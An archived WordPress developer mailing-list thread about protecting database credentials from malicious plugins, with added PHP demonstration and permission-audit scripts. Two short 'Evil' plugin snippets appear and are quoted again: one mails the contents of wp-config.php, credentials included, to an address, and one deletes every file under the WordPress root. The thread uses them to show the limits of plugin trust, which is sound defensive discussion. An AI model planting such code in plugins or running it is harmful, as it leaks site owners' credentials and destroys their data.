Keeping database connection info safe

9 messages

Keeping database connection info safe

Joseph Scott

I've been thinking about WordPress plugins and came up with some issues on
keeping database connection information safe.  In wp-config.php all
of the details needed to connect to the MySQL database are defined()  
as constants.  This makes it very easy for the $wpdb object to do its  
thing.  But once the database connection has been established, do we  
really need to have those constants still floating around?

It would be very easy to include some malicious code in a plugin that  
would attempt to email out those details to "bad people".  So my  
first thought was to simply undefine the database connection info  
once a successful database connection has been established.  It  
doesn't look like this is possible though, according to the PHP  
constants docs (at http://us2.php.net/manual/en/ 
language.constants.php).  Once a constant has been defined it can  
never, ever be changed or undefined, hence the term constant :-)

So perhaps there should be some discussion on setting the database
connection information in a way that can be later undefined once the
database connection has been established.  Maybe something as simple
as an array?  Something like:

$db_info["host"] = "localhost";
$db_info["user"] = "awesome";
$db_info["password"] = "133t";
$db_info["name"] = "cool_blog";

After the database connection is done a call to unset($db_info) or  
$db_info = "" or $db_info = array() would be enough to zap that info.

I realize there is a certain amount of trust when a user activates a  
plugin and there isn't really a way to prevent a plugin from shooting  
a user in the foot, but we can take some small steps to eliminate the  
potential risks.  No, this won't prevent a plugin from trashing a
database (since they'll still have access to the database  
connection), but it could prevent sensitive data from getting out.

Comments, thoughts, ideas?

--
Joseph Scott
[hidden email]
http://joseph.randomnetworks.com/



_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers

Re: Keeping database connection info safe

Dave Grijalva
I agree with this.  It could be argued that you should only install plugins
from users you trust or that you should view the source of a plugin before
installing it, but that's not really good enough.  Since the db password has
to be stored in the config file in cleartext, I think there really needs to
be a way to wipe it once the db is connected.

The only problems I see with this are that the config file can always just be
included again, or even opened and parsed by the malicious plugin.  Also, if
the connect info is removed from the memory, there would be no way to
reconnect to the db if the connection is severed, though I don't know if
there is even support for this in the wp core code.

A better way to do this with php5 is to use private member variables and a
setter function, but I don't think there is a PHP4 equivalent.  Can anybody
out there think of a PHP4 compatible way to secure that data?

-dave

On 2/24/06, Joseph Scott <[hidden email]> wrote:

>
>
> I've been thinking about WordPress plugins and came up with some issues on
> keeping database connection information safe.  In wp-config.php all
> of the details needed to connect to the MySQL database are defined()
> as constants.  This makes it very easy for the $wpdb object to do its
> thing.  But once the database connection has been established, do we
> really need to have those constants still floating around?
>
> It would be very easy to include some malicious code in a plugin that
> would attempt to email out those details to "bad people".  So my
> first thought was to simply undefine the database connection info
> once a successful database connection has been established.  It
> doesn't look like this is possible though, according to the PHP
> constants docs (at http://us2.php.net/manual/en/
> language.constants.php).  Once a constant has been defined it can
> never, ever be changed or undefined, hence the term constant :-)
>
> So perhaps there should be some discussion on setting the database
> connection information in a way that can be later undefined once the
> database connection has been established.  Maybe something as simple
> as an array?  Something like:
>
> $db_info["host"] = "localhost";
> $db_info["user"] = "awesome";
> $db_info["password"] = "133t";
> $db_info["name"] = "cool_blog";
>
> After the database connection is done a call to unset($db_info) or
> $db_info = "" or $db_info = array() would be enough to zap that info.
>
> I realize there is a certain amount of trust when a user activates a
> plugin and there isn't really a way to prevent a plugin from shooting
> a user in the foot, but we can take some small steps to eliminate the
> potential risks.  No this won't prevent a plugin from trashing a
> database (since they'll still have access to the database
> connection), but it could prevent sensitive data from getting out.
>
> Comments, thoughts, ideas?
>
> --
> Joseph Scott
> [hidden email]
> http://joseph.randomnetworks.com/
>
>
>

Re: Keeping database connection info safe

Sam Angove
In reply to this post by Joseph Scott
On 2/25/06, Joseph Scott <[hidden email]> wrote:
>
> It would be very easy to include some malicious code in a plugin that
> would attempt to email out those details to "bad people".  So my
> first thought was to simply undefine the database connection info
> once a successful database connection has been established.

<?php
/*
Plugin Name: Evil
*/
// Mails the raw text of wp-config.php, database credentials included, the moment the plugin file is loaded.
wp_mail( '[hidden email]', '', file_get_contents(ABSPATH . 'wp-config.php') );
?>

Dave Grijalva wrote:
> A better way to do this with php5 is to use private member variables and a
> setter function, but I don't think there is a PHP4 equivalent.  Can anybody
> out there think of a PHP4 compatible way to secure that data?

You could still read in the source file containing the setter, so
you're right back where you started.
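The script below is an added example, not code from this thread or from WordPress. It runs Joseph's proposal and Sam's objection in one go: a define()d constant stays defined for the rest of the request, the array form can be unset() once the connection is made, and neither matters once a plugin in the same process can re-include or read the config file. The config it loads is a constructed stand-in for wp-config.php written to a temp file so the script is self-contained; the user, password and database name are the placeholder values from the proposal, not real credentials.

```php
<?php
// Added example, not code from the thread or from WordPress.

// Constructed stand-in for wp-config.php, in the array form proposed above,
// written to a temp file so this script runs on its own.
$config_path = tempnam(sys_get_temp_dir(), 'wpcfg');
file_put_contents($config_path, <<<'PHP'
<?php
// Constructed stand-in for wp-config.php (placeholder values).
$db_info = [
    'host'     => 'localhost',
    'user'     => 'awesome',
    'password' => '133t',
    'name'     => 'cool_blog',
];
PHP
);

// 1. Constants live for the whole request. There is no undefine(), and a
//    second define() for the same name is refused (its warning is suppressed
//    here), so the original value is still readable afterwards.
define('DB_PASSWORD', '133t');
var_dump(defined('DB_PASSWORD'));
var_dump(@define('DB_PASSWORD', ''));
var_dump(DB_PASSWORD);

// 2. The array form can be wiped as soon as the connection is made. The
//    assignment stands in for the real connect call.
require $config_path;
$connected_as = $db_info['user'];
unset($db_info);
echo "connected as $connected_as, config array unset\n";
var_dump(isset($db_info));

// 3. Any later code in the same process gets the details back by including
//    the file again. Doing so inside a function keeps the variable local, so
//    the caller's unset() is not even disturbed.
function recover_by_include(string $path): array
{
    include $path;
    return $db_info;
}
var_dump(recover_by_include($config_path)['password']);

// ...or simply by reading the file as text, which is what Sam's plugin does.
$raw = file_get_contents($config_path);
var_dump(strpos($raw, '133t') !== false);

// Both recoveries need only read access to the config file, which the PHP
// process must have anyway in order to load it in the first place.
unlink($config_path);
```

Run it from the command line with `php` and compare the three sections: the constant survives every attempt to change it, the array disappears after unset(), and both recovery routes return the password regardless. The same holds for Dave's private-member idea, since the source file holding the setter is just as readable as wp-config.php.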

Re: Keeping database connection info safe

Joseph Scott

On Feb 24, 2006, at 4:49 PM, Sam Angove wrote:

> On 2/25/06, Joseph Scott <[hidden email]> wrote:
>>
>> It would be very easy to include some malicious code in a plugin that
>> would attempt to email out those details to "bad people".  So my
>> first thought was to simply undefine the database connection info
>> once a successful database connection has been established.
>
> <?php
> /*
> Plugin Name: Evil
> */
> wp_mail( '[hidden email]', '', file_get_contents(ABSPATH .
> 'wp-config.php') );
> ?>
>
> Dave Grijalva wrote:
>> A better way to do this with php5 is to use private member  
>> variables and a
>> setter function, but I don't think there is a PHP4 equivalent.  
>> Can anybody
>> out there think of a PHP4 compatible way to secure that data?
>
> You could still read in the source file containing the setter, so
> you're right back where you started.


You are absolutely correct.  I must admit that I hadn't thought about
re-including the wp-config.php file.  Well that bites.  Is there any
way to really protect against this in either PHP4 or PHP5?  I'm  
inclined at this point to say no and that everyone better be scanning  
their plugins for "evil".  Has anyone put together a list of things  
that should raise the red flag when they see it in a plugin?


--
Joseph Scott
[hidden email]
http://joseph.randomnetworks.com/




Re: Keeping database connection info safe

Andy Skelton
On 2/24/06, Joseph Scott <[hidden email]> wrote:
> You are absolutely correct.  I must admit that I hadn't thought about
> re-including the wp-config.php file.  Well that bites.  Is there any
> way to really protect against this in either PHP4 or PHP5?  I'm
> inclined at this point to say no and that everyone better be scanning
> their plugins for "evil".

That's right. In the absence of technical know-how or trusted
referrals, one cannot trust any code. There is no list of things to
look for. You have to trace every route through the code to discover
cleverly-hidden backdoors.

There has been discussion of a plugin certification procedure but it
never went anywhere. Check the archives if you're interested in
igniting that conversation again.

Andy

Re: Keeping database connection info safe

Rob Miller-4
In reply to this post by Joseph Scott
Joseph Scott wrote:

>
> You are absolutely correct.  I must admit that I hadn't thought about
> re-including the wp-config.php file.  Well that bites.  Is there any
> way to really protect against this in either PHP4 or PHP5?  I'm
> inclined at this point to say no and that everyone better be scanning
> their plugins for "evil".  Has anyone put together a list of things
> that should raise the red flag when they see it in a plugin?
>
>
> --
> Joseph Scott
> [hidden email]
> http://joseph.randomnetworks.com/
>
>
>

But then what's to stop the inevitable

<?php
/*
Plugin Name: Evil
*/

// Deletes every entry directly under the WordPress root that the PHP process has permission to unlink.
foreach(glob(ABSPATH.'/*') as $file) {
    unlink($file);
}

?>

?

There's no way of stopping malicious code from running other than
reviewing it before you run.

--
Rob Miller
http://robm.me.uk/ | http://kantian.co.uk/


Re: Keeping database connection info safe

Joseph Scott
Rob wrote:

>
> But then what's to stop the inevitable
>
> <?php
> /*
> Plugin Name: Evil
> */
>
> foreach(glob(ABSPATH.'/*') as $file) {
>    unlink($file);
> }
>
> ?>
>
> There's no way of stopping malicious code from running other than
> reviewing it before you run.


Properly set permissions should stop that from working.  The plugin
would be run as the web server user, who doesn't need write permissions
in order to run PHP code.

--
Joseph Scott
[hidden email]
http://joseph.randomnetworks.com/


Re: Keeping database connection info safe

Rob Miller-4
Joseph Scott wrote:

> Rob wrote:
>
>>
>> But then what's to stop the inevitable
>>
>> <?php
>> /*
>> Plugin Name: Evil
>> */
>>
>> foreach(glob(ABSPATH.'/*') as $file) {
>>    unlink($file);
>> }
>>
>> ?>
>>
>> There's no way of stopping malicious code from running other than
>> reviewing it before you run.
>
>
> Properly set permissions should stop that from working.  The plugin
> would be run as the web server user, who doesn't need write
> permissions in order to run PHP code.
>
> --
> Joseph Scott
> [hidden email]
> http://joseph.randomnetworks.com/
>
Except WordPress has absolutely no control over what user the web server
runs under.

--
Rob Miller
http://robm.me.uk/ | http://kantian.co.uk/


Re: Keeping database connection info safe

Jason Salaz
In reply to this post by Joseph Scott
Joseph Scott wrote:
>
> Properly set permissions should stop that from working.  The plugin
> would be run as the web server user, who doesn't need write permissions
> in order to run PHP code.

Three words:
PHP
as
CGI
(Which happens to be my preference.)
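The audit below is an added example, not code from this thread or from WordPress. It checks the thing the last three replies argue about for a real install: which user PHP is actually running as (web server user under mod_php, site owner under PHP as CGI or suexec), which files that user owns, and which files a plugin in that process could therefore overwrite or delete. Pass the install root as the first command-line argument; with no argument it builds a constructed demo tree with read-only PHP files, audits it, and removes it. The file names and the demo layout are assumptions made for the example.

```php
<?php
// Added example, not code from the thread or from WordPress.

function audit_install(string $root): array
{
    // posix_geteuid() is the uid the kernel checks permissions against: the
    // web server user under mod_php, the site owner under PHP as CGI/suexec.
    // The posix extension is absent on Windows, hence the fallback.
    $euid  = function_exists('posix_geteuid') ? posix_geteuid() : -1;
    $files = [];
    $iter  = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $path => $info) {
        $files[] = [
            'path'      => substr($path, strlen($root) + 1),
            'mode'      => sprintf('%04o', fileperms($path) & 0777),
            'owned'     => fileowner($path) === $euid,
            // Overwriting needs write permission on the file itself...
            'overwrite' => is_writable($path),
            // ...but unlink() needs write permission on the parent directory,
            // not on the file, so a 0444 file in a writable directory still goes.
            'delete'    => is_writable(dirname($path)),
        ];
    }
    return ['sapi' => php_sapi_name(), 'euid' => $euid, 'files' => $files];
}

function make_demo_tree(): string
{
    // Constructed layout with the permissions Joseph describes: PHP files
    // readable but not writable by the process that runs them.
    $root = sys_get_temp_dir() . '/wp-audit-' . getmypid();
    mkdir("$root/wp-content/plugins", 0755, true);
    file_put_contents("$root/wp-config.php", "<?php // constructed\n");
    file_put_contents("$root/wp-content/plugins/evil.php", "<?php // constructed\n");
    chmod("$root/wp-config.php", 0444);
    chmod("$root/wp-content/plugins/evil.php", 0444);
    return $root;
}

function remove_demo_tree(string $root): void
{
    unlink("$root/wp-content/plugins/evil.php");
    unlink("$root/wp-config.php");
    rmdir("$root/wp-content/plugins");
    rmdir("$root/wp-content");
    rmdir($root);
}

$demo   = !isset($argv[1]);
$root   = $demo ? make_demo_tree() : rtrim($argv[1], '/');
$report = audit_install($root);

printf("SAPI %s, effective uid %d\n", $report['sapi'], $report['euid']);
printf("%-32s %-5s %-6s %-9s %s\n", 'file', 'mode', 'owner', 'overwrite', 'delete');
foreach ($report['files'] as $f) {
    printf("%-32s %-5s %-6s %-9s %s\n",
        $f['path'], $f['mode'],
        $f['owned']     ? 'us'  : 'other',
        $f['overwrite'] ? 'yes' : 'no',
        $f['delete']    ? 'yes' : 'no');
}

// Ownership trumps mode bits: the owner can chmod() a file writable before
// touching it, so when PHP runs as the file owner (the PHP-as-CGI case Jason
// raises) read-only bits stop accidents, not a hostile plugin.
$owned = array_filter($report['files'], fn ($f) => $f['owned']);
if ($owned !== []) {
    printf("PHP runs as the owner of %d file(s); chmod alone cannot protect them.\n", count($owned));
}
if ($report['euid'] === 0) {
    echo "Running as root: every file is writable regardless of mode.\n";
}

if ($demo) {
    remove_demo_tree($root);
}
```

Run it under the same SAPI the site uses (drop it in the web root and request it, or run it through the CGI wrapper), not just from the command line, because the CLI runs as whoever invokes it and will not show what mod_php or suexec would do. Two columns carry the argument: `delete` is decided by the directory, so the read-only wp-config.php in the demo is still deletable, and `owner = us` means the mode bits are advisory, which is exactly the situation Jason describes for PHP as CGI.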